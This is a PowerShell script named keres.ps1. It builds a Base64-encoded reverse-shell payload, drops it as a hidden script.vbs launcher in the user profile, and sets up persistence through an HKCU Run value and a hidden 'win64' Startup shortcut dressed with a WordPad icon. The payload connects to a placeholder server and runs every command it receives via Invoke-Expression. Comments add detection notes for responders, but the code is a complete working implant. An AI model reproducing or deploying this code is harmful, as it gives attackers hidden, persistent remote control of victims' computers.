keres.ps1
# Parameters for keres.ps1. Most of them only shape the .lnk file created in the
# persistence section; none is validated before use.
param(
# Icon shown for the shortcut; the default borrows the icon of a stock Windows program.
[string]$IconLocation = "C:\Program Files\Windows NT\Accessories\wordpad.exe",
# Keyboard shortcut assigned to the .lnk via its HotKey property.
[string]$HotKey = "CTRL+W",
# Description text stored in the .lnk.
[string]$Description = "powershell",
# WshShortcut window style; 7 is the value for a minimized window.
[int]$WindowStyle = 7,
# When set (the default), the .lnk is given the Hidden file attribute.
[switch]$Hidden = $true,
# When set (the default), the registry Run value and Startup-folder shortcut are created.
[switch]$p=$true,
# Not referenced anywhere else in this listing.
[string]$ScriptArgument = ""
)
# Staging section: builds a PowerShell payload as text, Base64-encodes it, and writes a
# VBScript launcher for it into the current user's profile directory.
# Artifact for responders: <UserProfile>\script.vbs, marked Hidden at the end of this section.
$homePath = [Environment]::GetFolderPath("UserProfile")
$hiddenVbsPath = Join-Path -Path $homePath -ChildPath "script.vbs"
# The single-quoted here-string below is data: this script does not execute it and nothing
# in it is expanded here. Read as PowerShell, the text
#   - loops forever with a 60-second sleep, looking for a powershell process whose
#     CommandLine contains the marker string "Keres";
#   - when none is found and Test-Connection to 'server_address' succeeds, starts a hidden
#     powershell.exe whose script block opens a TcpClient to 'server_address':port_number;
#   - hands every chunk of bytes read from that socket to iex (Invoke-Expression) and
#     writes the output plus a "PS <path>> " prompt back, which amounts to remote command
#     execution in the context of whichever user runs it.
# 'server_address' and port_number are unfilled placeholders in this listing.
$psScript = @'
$uniqueIdentifier = "Keres"
$maxProcesses = 1
$spawnedProcesses = 0
while ($true){
$isRunning = Get-Process -Name powershell -ErrorAction SilentlyContinue | Where-Object { $_.CommandLine -like "*$uniqueIdentifier*" }
if (-not $isRunning -and $spawnedProcesses -lt $maxProcesses) {
$connectionTest = Test-Connection -ComputerName 'server_address' -Count 1 -Quiet
if ($connectionTest) {
Start-Process $PSHOME\powershell.exe -ArgumentList {
$uniqueIdentifier
$client = New-Object System.Net.Sockets.TcpClient
try {
$client.Connect('server_address', port_number)
$stream = $client.GetStream()
while ($true) {
if (-not $client.Connected) {
Write-Host "Connection lost. Reconnecting..."
Start-Sleep -Seconds 60 # Wait for 60 seconds before attempting to reconnect
break
}
$bytes = New-Object byte[] 65535
$i = $stream.Read($bytes, 0, $bytes.Length)
if ($i -le 0) {
Write-Host "Connection to server closed. Reconnecting..."
Start-Sleep -Seconds 60 # Wait for 60 seconds before attempting to reconnect
break
}
$data = [System.Text.Encoding]::ASCII.GetString($bytes, 0, $i)
$sendback = (iex $data 2>&1 | Out-String)
$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
$sendbyte = [System.Text.Encoding]::ASCII.GetBytes($sendback2)
$stream.Write($sendbyte, 0, $sendbyte.Length)
$stream.Flush()
}
} catch {
Write-Host "Error: $_"
} finally {
if ($stream) { $stream.Close() }
if ($client) { $client.Close() }
}
} -WindowStyle Hidden
$spawnedProcesses++
} else {
Write-Host "No connection to the server. Skipping process spawn."
}
} elseif ($spawnedProcesses -ge $maxProcesses) {
Write-Host "Maximum number of processes reached. Skipping process spawn."
} else {
Write-Host "Script is already running."
}
# Count processes after a 60-second wait
Start-Sleep -Seconds 60
$spawnedProcesses = (Get-Process -Name powershell -ErrorAction SilentlyContinue | Where-Object { $_.CommandLine -like "*$uniqueIdentifier*" }).Count
}
'@
# -EncodedCommand takes Base64 of UTF-16LE text, hence Encoding.Unicode here.
# Detection note: the encoding only hides the payload from someone reading the command
# line; with PowerShell script block logging enabled, the decoded text is recorded
# (event ID 4104).
$bytes = [System.Text.Encoding]::Unicode.GetBytes($psScript)
$encodedPsScript = [Convert]::ToBase64String($bytes)
# Define the VBS script. This here-string is double-quoted, so $encodedPsScript is expanded
# into it. In WshShell.Run the second argument 0 hides the window and False returns without
# waiting for the child process.
# Detection note: when Windows Script Host runs this file, the process tree is a script
# host spawning "powershell -EncodedCommand <long Base64>", a pattern worth alerting on.
$vbsScript = @"
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "powershell -EncodedCommand $encodedPsScript", 0, False
"@
# Write the VBS script to a file
Set-Content -Path $hiddenVbsPath -Value $vbsScript
# Set the hidden attribute, so the file is not listed by Explorer or dir with default
# settings; Get-ChildItem -Force or dir /a still shows it.
Set-ItemProperty -Path $hiddenVbsPath -Name Attributes -Value 'Hidden'
# Persistence section, run only when -p is set (the parameter's default).
# Artifacts for responders, all under the current user and needing no elevation:
#   - registry value "win64" under HKCU:\Software\Microsoft\Windows\CurrentVersion\Run,
#     holding the path of the shortcut below;
#   - win64.lnk in the user's Startup folder, optionally with the Hidden attribute.
# Detection note: both locations are standard autostart points, so registry value-set and
# file-create telemetry (for example Sysmon event IDs 13 and 11) on them covers this
# section; the name "win64" and the borrowed icon appear intended to look like a system
# component.
if ($p) {
#Define the path for the shortcut in the Startup folder
$shortcutPath = "$([Environment]::GetFolderPath('Startup'))\win64.lnk"
$registryPath = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
# The Run value is written before the .lnk exists; it stores the shortcut's path.
Set-ItemProperty -Path $registryPath -Name win64 -Value $shortcutPath
# Create a WScript Shell object
$wshell = New-Object -ComObject Wscript.Shell
# Create or modify the shortcut object
$shortcut = $wshell.CreateShortcut($shortcutPath)
# Set the icon location for the shortcut
$shortcut.IconLocation = $IconLocation
# Set the target path and arguments for the shortcut: powershell.exe with a hidden window,
# no profile, and the path of the staged script.vbs as its argument.
$shortcut.TargetPath = "powershell.exe"
$shortcut.Arguments = "-WindowStyle Hidden -NoProfile $hiddenVbsPath "
# Set the working directory for the shortcut (the directory that holds script.vbs)
$shortcut.WorkingDirectory = (Get-Item $hiddenVbsPath ).DirectoryName
# Set a hotkey for the shortcut
$shortcut.HotKey = $HotKey
# Set a description for the shortcut
$shortcut.Description = $Description
# Set the window style for the shortcut
$shortcut.WindowStyle = $WindowStyle
# Save the shortcut; this is the point at which win64.lnk is written to disk.
$shortcut.Save()
# Optionally set the 'Hidden' attribute. SetAttributes replaces the file's attribute set
# with Hidden alone; the file still shows up in listings that include hidden items.
if ($Hidden) {
[System.IO.File]::SetAttributes($shortcutPath, [System.IO.FileAttributes]::Hidden)
}
}